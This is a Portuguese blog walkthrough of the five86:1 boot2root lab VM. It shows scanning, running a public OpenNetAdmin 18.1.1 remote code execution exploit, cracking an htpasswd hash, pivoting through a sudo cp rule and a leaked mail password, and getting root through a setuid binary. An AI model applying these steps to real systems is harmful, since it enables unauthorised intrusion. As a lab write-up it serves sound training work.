Escrito por Leandro Esteves

five86: 1

Estou aqui novamente para apresentar mais uma boot2root VM para vocês. Dessa vez lhes trago five86: 1.
Essa máquina foi lançada em 08 de Janeiro de 2020 e o download pode ser realizado em five86:1.
Sem mais delongas, vamos ao que interessa!

Como sempre começamos com o host discovery:

kali@kali:~$ sudo netdiscover -i eth1 -r 192.168.56.0/24                                                                                                              
 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                        
                                                                                                                                                                      
 9 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 540                  
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:14      1      60  Unknown vendor                 
 192.168.56.100  08:00:27:c2:ed:df      3     180  PCS Systemtechnik GmbH         
 192.168.56.112  08:00:27:38:60:aa      5     300  PCS Systemtechnik GmbH

Agora que já identificamos nosso alvo, podemos descobrir quais são os serviços existentes nesse host:

kali@kali:~$sudo nmap -sS -sV -sC -p- 192.168.56.112
[sudo] password for kali: 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-05 21:34 EDT
Nmap scan report for 192.168.56.112
Host is up (0.00014s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 69:e6:3c:bf:72:f7:a0:00:f9:d9:f4:1d:68:e2:3c:bd (RSA)
|   256 45:9e:c7:1e:9f:5b:d3:ce:fc:17:56:f2:f6:42:ab:dc (ECDSA)
|_  256 ae:0a:9e:92:64:5f:86:20:c4:11:44:e0:58:32:e5:05 (ED25519)
80/tcp    open  http    Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/ona
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
10000/tcp open  http    MiniServ 1.920 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
MAC Address: 08:00:27:38:60:AA (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.76 seconds
kali@kali:~$

Com saída do nmap identificamos uma aplicação web rodando na porta TCP-80 e uma entrada /ona no arquivos robots.txt.

Acessando essa página identificamos o OpenNetAdmin.

Five86

Como a própria aplicação já nos avisou que estamos utilizando uma versão desatualizada, vamos tentar achar um algum tipo de exploit para a v18.1.1.

kali@kali:~$ searchsploit OpenNetAdmin
----------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                               |  Path
                                                                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution                                                                                | exploits/php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)                                                                 | exploits/php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution                                                                                  | exploits/php/webapps/47691.sh
----------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
kali@kali:~$ searchsploit -p 47691
  Exploit: OpenNetAdmin 18.1.1 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/47691
     Path: /usr/share/exploitdb/exploits/php/webapps/47691.sh
File Type: ASCII text, with CRLF line terminators

kali@kali:~$

Após copiarmos o exploit para nosso diretório, percebemos que o mesmo está no formato de DOS.

Five86-1

Basta digitarmos no VI o comando :set ff=unix para alterar o formato.

Five86-2

Agora podemos executar o exploit sem maiores problemas.

root@kali:~/exploits# chmod +x 47691.sh 
root@kali:~/exploits# ./47691.sh http://192.168.56.112/ona/
root@kali:~/exploits# ./47691.sh http://192.168.56.112/ona/
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

Procurando todos os arquivos que o usuário www-data é dono…

$ find / type f -user www-data | grep -v /proc
/run/lock/apache2
/var/cache/apache2/mod_cache_disk
/var/www/html/reports/.htaccess
/var/log/ona.log
/opt/ona/www/local/config
$

identificamos que o acesso ao diretório reports é restrito devido a configuração do htaccess.

$ cat /var/www/html/reports/.htaccess
AuthType Basic
AuthName "Restricted Area"
AuthUserFile /var/www/.htpasswd
require valid-user
$

Acessando o arquivo htpasswd identificamos a credencial de acesso do usuário douglas. Além disso, identificamos uma dica para criar um dicionário utilizando um tamanho e charset especifico.

$ cat /var/www/.htpasswd
douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1

# To make things slightly less painful (a standard dictionary will likely fail),
# use the following character set for this 10 character password: aefhrt
$

Para essa atividade, vamos utilizar o crunch.

root@kali:~# crunch 10 10 aefhrt > pwd.txt
Crunch will now generate the following amount of data: 665127936 bytes
634 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 60466176 
root@kali:~#

E quebrar a senha com o john.

root@kali:~# john --wordlist=pwd.txt hash.txt 
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
fatherrrrr       (douglas)
1g 0:00:01:28 DONE (2020-04-05 22:57) 0.01131g/s 245660p/s 245660c/s 245660C/s fatherhara..fatherrtet
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~#

Agora basta verificar se houve a reutilização de senha.

root@kali:~# ssh douglas@192.168.56.112
douglas@192.168.56.112's password: 
Linux five86-1 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
douglas@five86-1:~$

istockphoto-812392536-1024x1024

Vamos tentar escalonar privilégio para root.

Rapidamente já identificamos que o douglas consegue rodar o comando cp com privilégio do(a) jen.

douglas@five86-1:~$ sudo -l
Matching Defaults entries for douglas on five86-1:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User douglas may run the following commands on five86-1:
(jen) NOPASSWD: /bin/cp
douglas@five86-1:~$

A ideia agora é descobrir se existe algum arquivo do(a) Jen que possamos copiar.

douglas@five86-1:~$ find / type f -user jen 2> /dev/null | grep -Ev "/proc|/sys"
/var/mail/jen
/home/jen

O e-mail é uma boa opção.

douglas@five86-1:/tmp$ sudo -u jen /bin/cp --no-preserve=all /var/mail/jen mail

Conseguimos identificar a senha do usuário moss no e-mail enviado para jen.

douglas@five86-1:/tmp$ cat mail
From roy@five86-1 Wed Jan 01 03:17:00 2020
Return-path: <roy@five86-1>
Envelope-to: jen@five86-1
Delivery-date: Wed, 01 Jan 2020 03:17:00 -0500
Received: from roy by five86-1 with local (Exim 4.92)
        (envelope-from <roy@five86-1>)
        id 1imZBc-0001FU-El
        for jen@five86-1; Wed, 01 Jan 2020 03:17:00 -0500
To: jen@five86-1
Subject: Monday Moss
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1imZBc-0001FU-El@five86-1>
From: Roy Trenneman <roy@five86-1>
Date: Wed, 01 Jan 2020 03:17:00 -0500

Hi Jen,

As you know, I'll be on the "customer service" course on Monday due to that incident on Level 4 with the accounts people.

But anyway, I had to change Moss's password earlier today, so when Moss is back on Monday morning, can you let him know that his password is now Fire!Fire!

Moss will understand (ha ha ha ha).

Tanks,
Roy

douglas@five86-1:/tmp$ su - moss
Password: 
moss@five86-1:~$

Já autenticado com o usuário moss, Identificamos um diretório de games.

moss@five86-1:~$ ls -la
total 12
drwx------ 3 moss moss 4096 Jan 1 23:05 .
drwxr-xr-x 7 root root 4096 Jan 1 04:37 ..
lrwxrwxrwx 1 moss moss 9 Jan 1 23:05 .bash_history -> /dev/null
drwx------ 2 moss moss 4096 Jan 1 03:53 .games

O jogo que nos chamou atenção foi o upyourgame. Pois o mesmo possuí como o owner o usuário root e o bit setuid habilitado.

moss@five86-1:~/.games$ ls -la
total 28
drwx------ 2 moss moss  4096 Jan  1 03:53 .
drwx------ 3 moss moss  4096 Jan  1 23:05 ..
lrwxrwxrwx 1 moss moss    21 Jan  1 03:21 battlestar -> /usr/games/battlestar
lrwxrwxrwx 1 moss moss    14 Jan  1 03:23 bcd -> /usr/games/bcd
lrwxrwxrwx 1 moss moss    21 Jan  1 03:21 bombardier -> /usr/games/bombardier
lrwxrwxrwx 1 moss moss    17 Jan  1 03:22 empire -> /usr/games/empire
lrwxrwxrwx 1 moss moss    20 Jan  1 03:23 freesweep -> /usr/games/freesweep
lrwxrwxrwx 1 moss moss    15 Jan  1 03:23 hunt -> /usr/games/hunt
lrwxrwxrwx 1 moss moss    20 Jan  1 03:22 ninvaders -> /usr/games/ninvaders
lrwxrwxrwx 1 moss moss    17 Jan  1 03:19 nsnake -> /usr/games/nsnake
lrwxrwxrwx 1 moss moss    25 Jan  1 03:21 pacman4console -> /usr/games/pacman4console
lrwxrwxrwx 1 moss moss    17 Jan  1 03:22 petris -> /usr/games/petris
lrwxrwxrwx 1 moss moss    16 Jan  1 03:22 snake -> /usr/games/snake
lrwxrwxrwx 1 moss moss    17 Jan  1 03:20 sudoku -> /usr/games/sudoku
-rwsr-xr-x 1 root root 16824 Jan  1 03:52 upyourgame
lrwxrwxrwx 1 moss moss    16 Jan  1 03:22 worms -> /usr/games/worms
moss@five86-1:~/.games$

Identificamos via string, que trata-se de um jogo de perguntas e respostas. Porém o mais interessante é a chamado ao /bin/sh no final.

moss@five86-1:~/.games$ strings upyourgame
...
Would you like to play a game?
Could you please repeat that?
Nope, you'll need to enter that again.
You entered: No. Is this correct?
We appear to have a problem? Do we have a problem?
Made in Britain.
/bin/sh
;*3$"
...

Logo…

moss@five86-1:~/.games$ ./upyourgame
Would you like to play a game? no

Could you please repeat that? no

Nope, you'll need to enter that again. no

You entered: No. Is this correct? no

We appear to have a problem? Do we have a problem? no

Made in Britain.
# id
uid=0(root) gid=1001(moss) groups=1001(moss)
#

game-over-knuckles-only_480x

# cd /root
# ls
flag.txt
# cat flag.txt
8f3b38dd95eccf600593da4522251746
#

Referências:
https://til.hashrocket.com/posts/hu3jlszfrf-change-dos-to-unix-text-file-format-in-vim

Um comentário em “five86: 1

  1. Pingback: Five86-2

Deixe um comentário

Este site utiliza o Akismet para reduzir spam. Saiba como seus dados em comentários são processados.